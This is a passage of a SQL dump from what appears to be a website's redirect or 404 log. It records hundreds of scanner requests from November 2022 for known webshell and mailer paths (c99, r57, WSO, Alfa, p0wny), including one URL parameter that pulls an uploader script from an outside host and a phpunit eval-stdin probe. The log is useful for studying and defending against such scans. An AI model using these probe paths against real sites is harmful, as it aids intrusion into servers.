00:00:00',301),(30814,'http://3s-technologies.com.tr/en/ganteng.php',NULL,'','',3,0,'2022-11-13 06:42:03','0000-00-00 00:00:00',301),(30815,'http://3s-technologies.com.tr/en/j.php',NULL,'','',15,0,'2022-11-13 06:42:04','0000-00-00 00:00:00',301),(30816,'http://3s-technologies.com.tr/en/wp-admin/css/mailer.php',NULL,'','',4,0,'2022-11-13 06:42:04','0000-00-00 00:00:00',301),(30817,'http://3s-technologies.com.tr/en/mas.php',NULL,'','',14,0,'2022-11-13 06:42:05','0000-00-00 00:00:00',301),(30818,'http://3s-technologies.com.tr/en/wp-site.php',NULL,'','',15,0,'2022-11-13 06:42:06','0000-00-00 00:00:00',301),(30819,'http://3s-technologies.com.tr/en/wp-atom.php',NULL,'','',15,0,'2022-11-13 06:42:07','0000-00-00 00:00:00',301),(30820,'http://3s-technologies.com.tr/en/mia.php',NULL,'','',2,0,'2022-11-13 06:42:08','0000-00-00 00:00:00',301),(30821,'http://3s-technologies.com.tr/en/wp-admin/css/colors/coffee/langar.php',NULL,'','',4,0,'2022-11-13 06:42:09','0000-00-00 00:00:00',301),(30822,'http://3s-technologies.com.tr/en/wp-admin/css/bhx1.php',NULL,'','',4,0,'2022-11-13 06:42:10','0000-00-00 00:00:00',301),(30823,'http://3s-technologies.com.tr/en/wp-admin/leafmailer.php',NULL,'','',2,0,'2022-11-13 06:42:11','0000-00-00 00:00:00',301),(30824,'http://3s-technologies.com.tr/en/0x1999 private shell (0x shell).php',NULL,'','',2,0,'2022-11-13 06:42:12','0000-00-00 00:00:00',301),(30825,'http://3s-technologies.com.tr/en/tgh.php',NULL,'','',4,0,'2022-11-13 06:42:13','0000-00-00 00:00:00',301),(30826,'http://3s-technologies.com.tr/en/uzgnsomdco.php',NULL,'','',2,0,'2022-11-13 06:42:13','0000-00-00 00:00:00',301),(30827,'http://3s-technologies.com.tr/en/tebitwbejt.php',NULL,'','',2,0,'2022-11-13 06:42:14','0000-00-00 00:00:00',301),(30828,'http://3s-technologies.com.tr/en/xd.php',NULL,'','',6,0,'2022-11-13 06:42:15','0000-00-00 00:00:00',301),(30829,'http://3s-technologies.com.tr/en/wp-admin/wso.php',NULL,'','',10,0,'2022-11-13 06:42:16','0000-00-00 00:00:00',301),(30830,'http://3s-technologies.com.tr/en/wp-admin/c99.php',NULL,'','',4,0,'2022-11-13 06:42:17','0000-00-00 00:00:00',301),(30831,'http://3s-technologies.com.tr/en/wp-admin/up.php',NULL,'','',4,0,'2022-11-13 06:42:17','0000-00-00 00:00:00',301),(30832,'http://3s-technologies.com.tr/en/images/c99.php',NULL,'','',5,0,'2022-11-13 06:42:19','0000-00-00 00:00:00',301),(30833,'http://3s-technologies.com.tr/en/spawn.php',NULL,'','',4,0,'2022-11-13 06:42:19','0000-00-00 00:00:00',301),(30834,'http://3s-technologies.com.tr/en/byp.php',NULL,'','',23,0,'2022-11-13 06:42:21','0000-00-00 00:00:00',301),(30835,'http://3s-technologies.com.tr/en/tmp/whmcs.php',NULL,'','',4,0,'2022-11-13 06:42:21','0000-00-00 00:00:00',301),(30836,'http://3s-technologies.com.tr/en/gazashell.php',NULL,'','',2,0,'2022-11-13 06:42:23','0000-00-00 00:00:00',301),(30837,'http://3s-technologies.com.tr/en/.well-known/shell.php',NULL,'','',4,0,'2022-11-13 06:42:24','0000-00-00 00:00:00',301),(30838,'http://3s-technologies.com.tr/en/t.php',NULL,'','',21,0,'2022-11-13 06:42:24','0000-00-00 00:00:00',301),(30839,'http://3s-technologies.com.tr/en/downloadapp/wp-2019.php',NULL,'','',2,0,'2022-11-13 06:42:25','0000-00-00 00:00:00',301),(30840,'http://3s-technologies.com.tr/en/75888592_err0r.php',NULL,'','',2,0,'2022-11-13 06:42:26','0000-00-00 00:00:00',301),(30841,'http://3s-technologies.com.tr/en/wp-content/plugins/css-ready/file.php',NULL,'','',5,0,'2022-11-13 06:42:26','0000-00-00 00:00:00',301),(30842,'http://3s-technologies.com.tr/en/upx.php',NULL,'','',4,0,'2022-11-13 06:42:27','0000-00-00 00:00:00',301),(30843,'http://3s-technologies.com.tr/en/ww.php',NULL,'','',13,0,'2022-11-13 06:42:28','0000-00-00 00:00:00',301),(30844,'http://3s-technologies.com.tr/en/wp-content/plugins/upspy/con.php',NULL,'','',4,0,'2022-11-13 06:42:28','0000-00-00 00:00:00',301),(30845,'http://3s-technologies.com.tr/en/mininew.php',NULL,'','',2,0,'2022-11-13 06:42:29','0000-00-00 00:00:00',301),(30846,'http://3s-technologies.com.tr/en/wp-content/lx.php',NULL,'','',2,0,'2022-11-13 06:42:30','0000-00-00 00:00:00',301),(30847,'http://3s-technologies.com.tr/en/hexor.php',NULL,'','',4,0,'2022-11-13 06:42:32','0000-00-00 00:00:00',301),(30848,'http://3s-technologies.com.tr/en/xinfo.php',NULL,'','',4,0,'2022-11-13 06:42:34','0000-00-00 00:00:00',301),(30849,'http://3s-technologies.com.tr/en/p7m94.php',NULL,'','',1,0,'2022-11-13 06:42:35','0000-00-00 00:00:00',301),(30850,'http://3s-technologies.com.tr/en/images/am.php',NULL,'','',3,0,'2022-11-13 06:42:36','0000-00-00 00:00:00',301),(30851,'http://3s-technologies.com.tr/en/wp-admin/a.php',NULL,'','',11,0,'2022-11-13 06:42:38','0000-00-00 00:00:00',301),(30852,'http://3s-technologies.com.tr/en/wp-content/uploads/small.php',NULL,'','',4,0,'2022-11-13 06:42:39','0000-00-00 00:00:00',301),(30853,'http://3s-technologies.com.tr/en/images/gelay.php',NULL,'','',3,0,'2022-11-13 06:42:39','0000-00-00 00:00:00',301),(30854,'http://3s-technologies.com.tr/en/h4cker.php',NULL,'','',1,0,'2022-11-13 06:42:40','0000-00-00 00:00:00',301),(30855,'http://3s-technologies.com.tr/en/phpinj.php',NULL,'','',3,0,'2022-11-13 06:42:41','0000-00-00 00:00:00',301),(30856,'http://3s-technologies.com.tr/en/xmrlpc.php',NULL,'','',155,0,'2022-11-13 06:42:43','0000-00-00 00:00:00',301),(30857,'http://3s-technologies.com.tr/en/ yuuki.php',NULL,'','',1,0,'2022-11-13 06:42:43','0000-00-00 00:00:00',301),(30858,'http://3s-technologies.com.tr/en/postfs.php',NULL,'','',3,0,'2022-11-13 06:42:44','0000-00-00 00:00:00',301),(30859,'http://3s-technologies.com.tr/en/hacked.php',NULL,'','',3,0,'2022-11-13 06:42:45','0000-00-00 00:00:00',301),(30860,'http://3s-technologies.com.tr/en/id.php',NULL,'','',13,0,'2022-11-13 06:42:46','0000-00-00 00:00:00',301),(30861,'http://3s-technologies.com.tr/en/wp-content/1788821455_error_log.php',NULL,'','',1,0,'2022-11-13 06:42:47','0000-00-00 00:00:00',301),(30862,'http://3s-technologies.com.tr/en/@.php',NULL,'','',1,0,'2022-11-13 06:42:48','0000-00-00 00:00:00',301),(30863,'http://3s-technologies.com.tr/en/r00t-s3c.php',NULL,'','',1,0,'2022-11-13 06:42:49','0000-00-00 00:00:00',301),(30864,'http://3s-technologies.com.tr/en/wp-content/zfox.php',NULL,'','',1,0,'2022-11-13 06:42:50','0000-00-00 00:00:00',301),(30865,'http://3s-technologies.com.tr/en/wp-content/mode.php',NULL,'','',1,0,'2022-11-13 06:42:51','0000-00-00 00:00:00',301),(30866,'http://3s-technologies.com.tr/en/wp-content/batm.php',NULL,'','',1,0,'2022-11-13 06:42:51','0000-00-00 00:00:00',301),(30867,'http://3s-technologies.com.tr/en/wp-admin/anonime-shell.php',NULL,'','',1,0,'2022-11-13 06:42:52','0000-00-00 00:00:00',301),(30868,'http://3s-technologies.com.tr/en/shell.aspx',NULL,'','',3,0,'2022-11-13 06:42:52','0000-00-00 00:00:00',301),(30869,'http://3s-technologies.com.tr/en/alfa_data/alfacgiapi/fw.php',NULL,'','',1,0,'2022-11-13 06:42:53','0000-00-00 00:00:00',301),(30870,'http://3s-technologies.com.tr/en/up.phtml',NULL,'','',2,0,'2022-11-13 06:42:54','0000-00-00 00:00:00',301),(30871,'http://3s-technologies.com.tr/en/wp-admin/css/colors/coffee/marijuana.php',NULL,'','',4,0,'2022-11-13 06:42:54','0000-00-00 00:00:00',301),(30872,'http://3s-technologies.com.tr/en/tmp/readme.php',NULL,'','',3,0,'2022-11-13 06:42:55','0000-00-00 00:00:00',301),(30873,'http://3s-technologies.com.tr/en/tmp/dz1.php',NULL,'','',1,0,'2022-11-13 06:42:56','0000-00-00 00:00:00',301),(30874,'http://3s-technologies.com.tr/en/idx.php',NULL,'','',16,0,'2022-11-13 06:42:56','0000-00-00 00:00:00',301),(30875,'http://3s-technologies.com.tr/en/takeout.php',NULL,'','',1,0,'2022-11-13 06:42:57','0000-00-00 00:00:00',301),(30876,'http://3s-technologies.com.tr/en/sts.php',NULL,'','',4,0,'2022-11-13 06:42:58','0000-00-00 00:00:00',301),(30877,'http://3s-technologies.com.tr/en/1877x.php',NULL,'','',1,0,'2022-11-13 06:42:59','0000-00-00 00:00:00',301),(30878,'http://3s-technologies.com.tr/en/alfa_data/alfacgiapi/alfa.php',NULL,'','',1,0,'2022-11-13 06:43:01','0000-00-00 00:00:00',301),(30879,'http://3s-technologies.com.tr/en/dz0.php',NULL,'','',3,0,'2022-11-13 06:43:01','0000-00-00 00:00:00',301),(30880,'http://3s-technologies.com.tr/en/wp_backup.php',NULL,'','',3,0,'2022-11-13 06:43:02','0000-00-00 00:00:00',301),(30881,'http://3s-technologies.com.tr/en/.well-known/gelay.php',NULL,'','',3,0,'2022-11-13 06:43:03','0000-00-00 00:00:00',301),(30882,'http://3s-technologies.com.tr/en/edit.php',NULL,'','',179,0,'2022-11-13 06:43:03','0000-00-00 00:00:00',301),(30883,'http://3s-technologies.com.tr/en/wp-admin/leafmailer2.8.php',NULL,'','',1,0,'2022-11-13 06:43:04','0000-00-00 00:00:00',301),(30884,'http://3s-technologies.com.tr/en/evil.php',NULL,'','',15,0,'2022-11-13 06:43:05','0000-00-00 00:00:00',301),(30885,'http://3s-technologies.com.tr/en/user.php',NULL,'','',33,0,'2022-11-13 06:43:06','0000-00-00 00:00:00',301),(30886,'http://3s-technologies.com.tr/en/mass.php',NULL,'','',4,0,'2022-11-13 06:43:07','0000-00-00 00:00:00',301),(30887,'http://3s-technologies.com.tr/en/maho.php',NULL,'','',1,0,'2022-11-13 06:43:07','0000-00-00 00:00:00',301),(30888,'http://3s-technologies.com.tr/en/wp-admin/css/gelay.php',NULL,'','',3,0,'2022-11-13 06:43:09','0000-00-00 00:00:00',301),(30889,'http://3s-technologies.com.tr/en/poplfqudwb.php',NULL,'','',1,0,'2022-11-13 06:43:11','0000-00-00 00:00:00',301),(30890,'http://3s-technologies.com.tr/en/wp-admin-configs.php',NULL,'','',1,0,'2022-11-13 06:43:12','0000-00-00 00:00:00',301),(30891,'http://3s-technologies.com.tr/en/images/upl.php',NULL,'','',3,0,'2022-11-13 06:43:13','0000-00-00 00:00:00',301),(30892,'http://3s-technologies.com.tr/en/login.phtml',NULL,'','',3,0,'2022-11-13 06:43:13','0000-00-00 00:00:00',301),(30893,'http://3s-technologies.com.tr/en/wp-includes/css/modules.php',NULL,'','',5,0,'2022-11-13 06:43:14','0000-00-00 00:00:00',301),(30894,'http://3s-technologies.com.tr/en/wp-admin/includes/edit-tag-menu.php',NULL,'','',4,0,'2022-11-13 06:43:15','0000-00-00 00:00:00',301),(30895,'http://3s-technologies.com.tr/en/ea.php',NULL,'','',1,0,'2022-11-13 06:43:17','0000-00-00 00:00:00',301),(30896,'http://3s-technologies.com.tr/en/administration/sym.php',NULL,'','',1,0,'2022-11-13 06:43:17','0000-00-00 00:00:00',301),(30897,'http://3s-technologies.com.tr/en/wp-content/plugins/wp-diambar/includes/loadme.php',NULL,'','',28,0,'2022-11-13 06:43:18','0000-00-00 00:00:00',301),(30898,'http://3s-technologies.com.tr/en/images/leaf.php',NULL,'','',1,0,'2022-11-13 06:43:19','0000-00-00 00:00:00',301),(30899,'http://3s-technologies.com.tr/en/wp-video.php',NULL,'','',8,0,'2022-11-13 06:43:19','0000-00-00 00:00:00',301),(30900,'http://3s-technologies.com.tr/en/v4ga.php',NULL,'','',1,0,'2022-11-13 06:43:20','0000-00-00 00:00:00',301),(30901,'http://3s-technologies.com.tr/en/wp-content/plugins/tusupugnpr/up.php?php=anonymousfox.is/_@files/php/up.txt',NULL,'','',1,0,'2022-11-13 06:43:21','0000-00-00 00:00:00',301),(30902,'http://3s-technologies.com.tr/en/p0wny-shell.php',NULL,'','',5,0,'2022-11-13 06:43:22','0000-00-00 00:00:00',301),(30903,'http://3s-technologies.com.tr/en/sosyeteshell.php',NULL,'','',1,0,'2022-11-13 06:43:22','0000-00-00 00:00:00',301),(30904,'http://3s-technologies.com.tr/en/tl.php',NULL,'','',1,0,'2022-11-13 06:43:24','0000-00-00 00:00:00',301),(30905,'http://3s-technologies.com.tr/en/otm4n3x.php',NULL,'','',1,0,'2022-11-13 06:43:25','0000-00-00 00:00:00',301),(30906,'http://3s-technologies.com.tr/en/alfav41.php',NULL,'','',1,0,'2022-11-13 06:43:26','0000-00-00 00:00:00',301),(30907,'http://3s-technologies.com.tr/en/wp-content/uploads/f0x.php',NULL,'','',1,0,'2022-11-13 06:43:26','0000-00-00 00:00:00',301),(30908,'http://3s-technologies.com.tr/en/snd.php',NULL,'','',4,0,'2022-11-13 06:43:27','0000-00-00 00:00:00',301),(30909,'http://3s-technologies.com.tr/en/owl.php',NULL,'','',4,0,'2022-11-13 06:43:28','0000-00-00 00:00:00',301),(30910,'http://3s-technologies.com.tr/en/wp-admin/includes/langar.php',NULL,'','',3,0,'2022-11-13 06:43:28','0000-00-00 00:00:00',301),(30911,'http://3s-technologies.com.tr/en/0byt3m1n1.php',NULL,'','',3,0,'2022-11-13 06:43:29','0000-00-00 00:00:00',301),(30912,'http://3s-technologies.com.tr/en/up.php7',NULL,'','',2,0,'2022-11-13 06:43:30','0000-00-00 00:00:00',301),(30913,'http://3s-technologies.com.tr/en/pas.phtml',NULL,'','',1,0,'2022-11-13 06:43:31','0000-00-00 00:00:00',301),(30914,'http://3s-technologies.com.tr/en/up.php5',NULL,'','',2,0,'2022-11-13 06:43:32','0000-00-00 00:00:00',301),(30915,'http://3s-technologies.com.tr/en/wp-includes/css/upl.php',NULL,'','',3,0,'2022-11-13 06:43:32','0000-00-00 00:00:00',301),(30916,'http://3s-technologies.com.tr/en/wp-bita.php?encoded=shell',NULL,'','',1,0,'2022-11-13 06:43:33','0000-00-00 00:00:00',301),(30917,'http://3s-technologies.com.tr/en/wp-ctac.php?encoded=shell',NULL,'','',1,0,'2022-11-13 06:43:34','0000-00-00 00:00:00',301),(30918,'http://3s-technologies.com.tr/en/wp-content/mailer.php',NULL,'','',3,0,'2022-11-13 06:43:34','0000-00-00 00:00:00',301),(30919,'http://3s-technologies.com.tr/en/cp.php',NULL,'','',4,0,'2022-11-13 06:43:35','0000-00-00 00:00:00',301),(30920,'http://3s-technologies.com.tr/en/wp-admin/css/colors/coffee/gelay.php',NULL,'','',3,0,'2022-11-13 06:43:36','0000-00-00 00:00:00',301),(30921,'http://3s-technologies.com.tr/en/bb.php',NULL,'','',13,0,'2022-11-13 06:43:36','0000-00-00 00:00:00',301),(30922,'http://3s-technologies.com.tr/en/kntl.php',NULL,'','',1,0,'2022-11-13 06:43:37','0000-00-00 00:00:00',301),(30923,'http://3s-technologies.com.tr/en/default.php',NULL,'','',22,0,'2022-11-13 06:43:38','0000-00-00 00:00:00',301),(30924,'http://3s-technologies.com.tr/en/teslaxx.php',NULL,'','',3,0,'2022-11-13 06:43:39','0000-00-00 00:00:00',301),(30925,'http://3s-technologies.com.tr/en/dxshell.php',NULL,'','',3,0,'2022-11-13 06:43:39','0000-00-00 00:00:00',301),(30926,'http://3s-technologies.com.tr/en/tmp/cpn.php',NULL,'','',3,0,'2022-11-13 06:43:40','0000-00-00 00:00:00',301),(30927,'http://3s-technologies.com.tr/en/tmp/r57.php',NULL,'','',3,0,'2022-11-13 06:43:41','0000-00-00 00:00:00',301),(30928,'http://3s-technologies.com.tr/en/tmp/sok.php',NULL,'','',3,0,'2022-11-13 06:43:41','0000-00-00 00:00:00',301),(30929,'http://3s-technologies.com.tr/en/tmp/r1z.php',NULL,'','',3,0,'2022-11-13 06:43:42','0000-00-00 00:00:00',301),(30930,'http://3s-technologies.com.tr/en/tmp/sym.php',NULL,'','',1,0,'2022-11-13 06:43:43','0000-00-00 00:00:00',301),(30931,'http://3s-technologies.com.tr/en/tmp/sql.php',NULL,'','',1,0,'2022-11-13 06:43:43','0000-00-00 00:00:00',301),(30932,'http://3s-technologies.com.tr/en/tmp/l3b.php',NULL,'','',1,0,'2022-11-13 06:43:44','0000-00-00 00:00:00',301),(30933,'http://3s-technologies.com.tr/en/xm.php',NULL,'','',11,0,'2022-11-13 06:43:45','0000-00-00 00:00:00',301),(30934,'http://3s-technologies.com.tr/en/wp-admin/css/colors/coffee/sym403.php',NULL,'','',3,0,'2022-11-13 06:43:45','0000-00-00 00:00:00',301),(30935,'http://3s-technologies.com.tr/en/dhanush.php',NULL,'','',1,0,'2022-11-13 06:43:46','0000-00-00 00:00:00',301),(30936,'http://3s-technologies.com.tr/en/wp-includes/css/maro.php',NULL,'','',3,0,'2022-11-13 06:43:47','0000-00-00 00:00:00',301),(30937,'http://3s-technologies.com.tr/en/b2.php',NULL,'','',1,0,'2022-11-13 06:43:47','0000-00-00 00:00:00',301),(30938,'http://3s-technologies.com.tr/en/amigo.php',NULL,'','',1,0,'2022-11-13 06:43:48','0000-00-00 00:00:00',301),(30939,'http://3s-technologies.com.tr/en/djfksr4.php',NULL,'','',1,0,'2022-11-13 06:43:49','0000-00-00 00:00:00',301),(30940,'http://3s-technologies.com.tr/en/angyw.php',NULL,'','',1,0,'2022-11-13 06:43:49','0000-00-00 00:00:00',301),(30941,'http://3s-technologies.com.tr/en/wp-admin/maint/a.php',NULL,'','',3,0,'2022-11-13 06:43:50','0000-00-00 00:00:00',301),(30942,'http://3s-technologies.com.tr/en/wp-admin/codeboy1877_up.php',NULL,'','',1,0,'2022-11-13 06:43:51','0000-00-00 00:00:00',301),(30943,'http://3s-technologies.com.tr/en/wp-admin/romfc.php',NULL,'','',1,0,'2022-11-13 06:43:51','0000-00-00 00:00:00',301),(30944,'http://3s-technologies.com.tr/en/alfa_data/alfacgiapi/uploader.php',NULL,'','',1,0,'2022-11-13 06:43:53','0000-00-00 00:00:00',301),(30945,'http://3s-technologies.com.tr/en/w4k.php',NULL,'','',3,0,'2022-11-13 06:43:53','0000-00-00 00:00:00',301),(30946,'http://3s-technologies.com.tr/en/wp-admin/includes/about.php',NULL,'','',13,0,'2022-11-13 06:43:54','0000-00-00 00:00:00',301),(30947,'http://3s-technologies.com.tr/en/wp-admin/includes/gelay.php',NULL,'','',3,0,'2022-11-13 06:43:55','0000-00-00 00:00:00',301),(30948,'http://3s-technologies.com.tr/en/wp-admin/unziperpoe.php',NULL,'','',1,0,'2022-11-13 06:43:55','0000-00-00 00:00:00',301),(30949,'http://3s-technologies.com.tr/en/darkshell.php',NULL,'','',3,0,'2022-11-13 06:43:56','0000-00-00 00:00:00',301),(30950,'http://3s-technologies.com.tr/en/alfa_data/alfacgiapi/ups.php',NULL,'','',1,0,'2022-11-13 06:43:57','0000-00-00 00:00:00',301),(30951,'http://3s-technologies.com.tr/en/wp-singupp.php',NULL,'','',3,0,'2022-11-13 06:43:57','0000-00-00 00:00:00',301),(30952,'http://3s-technologies.com.tr/en/wp-content/plugins/cakil/up.php',NULL,'','',3,0,'2022-11-13 06:43:58','0000-00-00 00:00:00',301),(30953,'http://3s-technologies.com.tr/en/foxwsov1.php',NULL,'','',7,0,'2022-11-13 06:43:59','0000-00-00 00:00:00',301),(30954,'http://3s-technologies.com.tr/en/alfa3.php',NULL,'','',3,0,'2022-11-13 06:44:00','0000-00-00 00:00:00',301),(30955,'http://3s-technologies.com.tr/en/ak-74.php',NULL,'','',3,0,'2022-11-13 06:44:02','0000-00-00 00:00:00',301),(30956,'http://3s-technologies.com.tr/en/alfa1.php',NULL,'','',3,0,'2022-11-13 06:44:02','0000-00-00 00:00:00',301),(30957,'http://3s-technologies.com.tr/en/alf42.php',NULL,'','',3,0,'2022-11-13 06:44:04','0000-00-00 00:00:00',301),(30958,'http://3s-technologies.com.tr/en/angel.php',NULL,'','',1,0,'2022-11-13 06:44:05','0000-00-00 00:00:00',301),(30959,'http://3s-technologies.com.tr/en/anjay.php',NULL,'','',1,0,'2022-11-13 06:44:05','0000-00-00 00:00:00',301),(30960,'http://3s-technologies.com.tr/en/commandshell.php',NULL,'','',1,0,'2022-11-13 06:44:07','0000-00-00 00:00:00',301),(30961,'http://3s-technologies.com.tr/en/bv7binary.php',NULL,'','',1,0,'2022-11-13 06:44:07','0000-00-00 00:00:00',301),(30962,'http://3s-technologies.com.tr/en/pws.php',NULL,'','',1,0,'2022-11-13 06:44:08','0000-00-00 00:00:00',301),(30963,'http://3s-technologies.com.tr/en/ovshell.php',NULL,'','',3,0,'2022-11-13 06:44:09','0000-00-00 00:00:00',301),(30964,'http://3s-technologies.com.tr/en/r57.php',NULL,'','',6,0,'2022-11-13 06:44:09','0000-00-00 00:00:00',301),(30965,'http://3s-technologies.com.tr/en/wp-xxx.php',NULL,'','',3,0,'2022-11-13 06:44:10','0000-00-00 00:00:00',301),(30966,'http://3s-technologies.com.tr/en/wso2.7.php',NULL,'','',3,0,'2022-11-13 06:44:11','0000-00-00 00:00:00',301),(30967,'http://3s-technologies.com.tr/en/wso2.8.php',NULL,'','',3,0,'2022-11-13 06:44:11','0000-00-00 00:00:00',301),(30968,'http://3s-technologies.com.tr/en/wp-mna.php',NULL,'','',4,0,'2022-11-13 06:44:12','0000-00-00 00:00:00',301),(30969,'http://3s-technologies.com.tr/en/wp-one.php',NULL,'','',16,0,'2022-11-13 06:44:13','0000-00-00 00:00:00',301),(30970,'http://3s-technologies.com.tr/en/wp-rss.php',NULL,'','',14,0,'2022-11-13 06:44:13','0000-00-00 00:00:00',301),(30971,'http://3s-technologies.com.tr/en/wsanon.php',NULL,'','',14,0,'2022-11-13 06:44:14','0000-00-00 00:00:00',301),(30972,'http://3s-technologies.com.tr/en/wp-admin/includes/shadowx.php',NULL,'','',3,0,'2022-11-13 06:44:15','0000-00-00 00:00:00',301),(30973,'http://3s-technologies.com.tr/en/wp-admin/mailer.php',NULL,'','',3,0,'2022-11-13 06:44:16','0000-00-00 00:00:00',301),(30974,'http://3s-technologies.com.tr/en/wp-admin/langar.php',NULL,'','',3,0,'2022-11-13 06:44:17','0000-00-00 00:00:00',301),(30975,'http://3s-technologies.com.tr/en/wp-admin/css/colors/coffee/shells.php',NULL,'','',3,0,'2022-11-13 06:44:18','0000-00-00 00:00:00',301),(30976,'http://3s-technologies.com.tr/en/wp-admin/css/up.php',NULL,'','',3,0,'2022-11-13 06:44:19','0000-00-00 00:00:00',301),(30977,'http://3s-technologies.com.tr/en/la.php',NULL,'','',11,0,'2022-11-13 06:44:19','0000-00-00 00:00:00',301),(30978,'http://3s-technologies.com.tr/en/wp-content/shell20211028.php',NULL,'','',8,0,'2022-11-13 06:44:21','0000-00-00 00:00:00',301),(30979,'http://3s-technologies.com.tr/en/wp-admin/shapes.php',NULL,'','',4,0,'2022-11-13 06:44:22','0000-00-00 00:00:00',301),(30980,'http://3s-technologies.com.tr/en/wiki-index.php',NULL,'','',3,0,'2022-11-13 06:44:22','0000-00-00 00:00:00',301),(30981,'http://3s-technologies.com.tr/en/wp-admin/includes/leafmailer.php',NULL,'','',1,0,'2022-11-13 06:44:23','0000-00-00 00:00:00',301),(30982,'http://3s-technologies.com.tr/en/wp-content/plugins/wp-db-ajax-made/wp-ajax.php',NULL,'','',5,0,'2022-11-13 06:44:24','0000-00-00 00:00:00',301),(30983,'http://3s-technologies.com.tr/en/kil.php',NULL,'','',3,0,'2022-11-13 06:44:25','0000-00-00 00:00:00',301),(30984,'http://3s-technologies.com.tr/en/wp-content/masshp.php',NULL,'','',1,0,'2022-11-13 06:44:25','0000-00-00 00:00:00',301),(30985,'http://3s-technologies.com.tr/en/wp-admin/includes/mailer.php.php',NULL,'','',1,0,'2022-11-13 06:44:26','0000-00-00 00:00:00',301),(30986,'http://3s-technologies.com.tr/en/cmd.php',NULL,'','',14,0,'2022-11-13 06:44:27','0000-00-00 00:00:00',301),(30987,'http://3s-technologies.com.tr/en/vesiw.php',NULL,'','',1,0,'2022-11-13 06:44:27','0000-00-00 00:00:00',301),(30988,'http://3s-technologies.com.tr/en/boilxnplrr.php',NULL,'','',1,0,'2022-11-13 06:44:28','0000-00-00 00:00:00',301),(30989,'http://3s-technologies.com.tr/en/sc.php',NULL,'','',1,0,'2022-11-13 06:44:30','0000-00-00 00:00:00',301),(30990,'http://3s-technologies.com.tr/en/tmp/plupload/vuln.php',NULL,'','',1,0,'2022-11-13 06:44:30','0000-00-00 00:00:00',301),(30991,'http://3s-technologies.com.tr/en/wp-includes/pomo/so.php',NULL,'','',3,0,'2022-11-13 06:44:31','0000-00-00 00:00:00',301),(30992,'http://3s-technologies.com.tr/en/g6shell.php',NULL,'','',1,0,'2022-11-13 06:44:32','0000-00-00 00:00:00',301),(30993,'http://3s-technologies.com.tr/en/wp-content/think.php',NULL,'','',4,0,'2022-11-13 06:44:32','0000-00-00 00:00:00',301),(30994,'http://3s-technologies.com.tr/en/wp-content/plugins/cekidot/alf.php',NULL,'','',4,0,'2022-11-13 06:44:33','0000-00-00 00:00:00',301),(30995,'http://3s-technologies.com.tr/en/simattacker.php',NULL,'','',3,0,'2022-11-13 06:44:34','0000-00-00 00:00:00',301),(30996,'http://3s-technologies.com.tr/en/alfa-shell-v4.php',NULL,'','',11,0,'2022-11-13 06:44:34','0000-00-00 00:00:00',301),(30997,'http://3s-technologies.com.tr/en/d.php',NULL,'','',20,0,'2022-11-13 06:44:35','0000-00-00 00:00:00',301),(30998,'http://3s-technologies.com.tr/en/a.aspx',NULL,'','',3,0,'2022-11-13 06:44:36','0000-00-00 00:00:00',301),(30999,'http://3s-technologies.com.tr/en/wp-content/plugins/cache-wordpress/payment.php',NULL,'','',4,0,'2022-11-13 06:44:37','0000-00-00 00:00:00',301),(31000,'http://3s-technologies.com.tr/en/wp-content/uploads/simple-file-list/alfa.php',NULL,'','',3,0,'2022-11-13 06:44:37','0000-00-00 00:00:00',301),(31001,'http://3s-technologies.com.tr/en/ls.php',NULL,'','',1,0,'2022-11-13 06:44:38','0000-00-00 00:00:00',301),(31002,'http://3s-technologies.com.tr/en/images/leafmailer2.8.php',NULL,'','',1,0,'2022-11-13 06:44:39','0000-00-00 00:00:00',301),(31003,'http://3s-technologies.com.tr/en/well.php',NULL,'','',3,0,'2022-11-13 06:44:40','0000-00-00 00:00:00',301),(31004,'http://3s-technologies.com.tr/en/wpse.php',NULL,'','',1,0,'2022-11-13 06:44:41','0000-00-00 00:00:00',301),(31005,'http://3s-technologies.com.tr/en/wp-includes/x.php',NULL,'','',3,0,'2022-11-13 06:44:41','0000-00-00 00:00:00',301),(31006,'http://3s-technologies.com.tr/en/wp-admin/css/shadowx.php',NULL,'','',3,0,'2022-11-13 06:44:42','0000-00-00 00:00:00',301),(31007,'http://3s-technologies.com.tr/en/pass.php',NULL,'','',2,0,'2022-11-13 06:44:43','0000-00-00 00:00:00',301),(31008,'http://3s-technologies.com.tr/en/wp-includes/fw.php',NULL,'','',4,0,'2022-11-13 06:44:43','0000-00-00 00:00:00',301),(31009,'http://3s-technologies.com.tr/en/wp-includes/am.php',NULL,'','',3,0,'2022-11-13 06:44:44','0000-00-00 00:00:00',301),(31010,'http://3s-technologies.com.tr/en/wp-includes/up.php',NULL,'','',3,0,'2022-11-13 06:44:45','0000-00-00 00:00:00',301),(31011,'http://3s-technologies.com.tr/en/wp-includes/45.php',NULL,'','',3,0,'2022-11-13 06:44:45','0000-00-00 00:00:00',301),(31012,'http://3s-technologies.com.tr/en/priv.php',NULL,'','',17,0,'2022-11-13 06:44:46','0000-00-00 00:00:00',301),(31013,'http://3s-technologies.com.tr/en/0day.php',NULL,'','',1,0,'2022-11-13 06:44:47','0000-00-00 00:00:00',301),(31014,'http://3s-technologies.com.tr/en/pref.php',NULL,'','',12,0,'2022-11-13 06:44:48','0000-00-00 00:00:00',301),(31015,'http://3s-technologies.com.tr/en/ah.php',NULL,'','',3,0,'2022-11-13 06:44:50','0000-00-00 00:00:00',301),(31016,'http://3s-technologies.com.tr/en/tryagshell.php',NULL,'','',1,0,'2022-11-13 06:44:50','0000-00-00 00:00:00',301),(31017,'http://3s-technologies.com.tr/en/wp-includes/css/about.php',NULL,'','',7,0,'2022-11-13 06:44:51','0000-00-00 00:00:00',301),(31018,'http://3s-technologies.com.tr/en/wp-content/finca.php',NULL,'','',1,0,'2022-11-13 06:44:52','0000-00-00 00:00:00',301),(31019,'http://3s-technologies.com.tr/en/images/fox.php',NULL,'','',3,0,'2022-11-13 06:44:53','0000-00-00 00:00:00',301),(31020,'http://3s-technologies.com.tr/en/wp-mails.php',NULL,'','',14,0,'2022-11-13 06:44:54','0000-00-00 00:00:00',301),(31021,'http://3s-technologies.com.tr/en/images/alfashell.php',NULL,'','',3,0,'2022-11-13 06:44:55','0000-00-00 00:00:00',301),(31022,'https://3s-technologies.com.tr/tr/pub/opt/magento/var/resource_config.json',NULL,'','',1,0,'2022-11-14 04:50:32','0000-00-00 00:00:00',301),(31023,'https://3s-technologies.com.tr/en/using-joomla/extensions/pub/opt/magento/var/resource_config.json',NULL,'','',1,0,'2022-11-14 04:50:35','0000-00-00 00:00:00',301),(31024,'https://3s-technologies.com.tr/tr/yii/vendor/phpunit/phpunit/src/util/php/eval-stdin.php',NULL,'','',1,0,'2022-11-14 08:48:10','0000-00-00 